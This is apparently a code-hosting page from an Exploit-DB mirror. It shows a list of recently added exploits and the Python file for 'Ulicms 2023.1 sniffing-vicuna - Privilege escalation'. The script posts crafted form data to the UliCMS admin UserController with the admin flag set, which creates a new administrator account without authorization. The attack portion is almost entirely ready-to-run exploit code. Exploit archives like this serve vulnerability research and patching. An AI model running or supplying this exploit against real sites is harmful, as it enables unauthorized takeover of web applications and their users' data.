bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51433.py
Exploit-DB cb5c64da21 DB: 2023-06-01 
13 changes to exploits/shellcodes/ghdb

Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Pydio Cells 4.1.2 - Server-Side Request Forgery
Pydio Cells 4.1.2 - Unauthorised Role Assignments

Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)

MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)

Faculty Evaluation System 1.0 - Unauthenticated File Upload

Online Security Guards Hiring System 1.0 - Reflected XSS

Online shopping system advanced 1.0 - Multiple Vulnerabilities

Rukovoditel 3.3.1 - CSV injection

SCRMS 2023-05-27 1.0 - Multiple SQL Injection

Service Provider Management System v1.0 - SQL Injection

Ulicms-2023.1-sniffing-vicuna - Privilege escalation

unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
2023-06-01 00:16:25 +00:00

32 lines
No EOL
1.1 KiB
Python
Executable file
Raw Blame History

#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Privilege escalation
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna
import requests
new_name=input("name: ")
new_email=input("email: ")
new_pass=input("password: ")
url = "http://localhost/dist/admin/index.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
print("Request is success and created new admin account")
else:
print("Request is failure.!!")
Reference in a new issue View git blame Copy permalink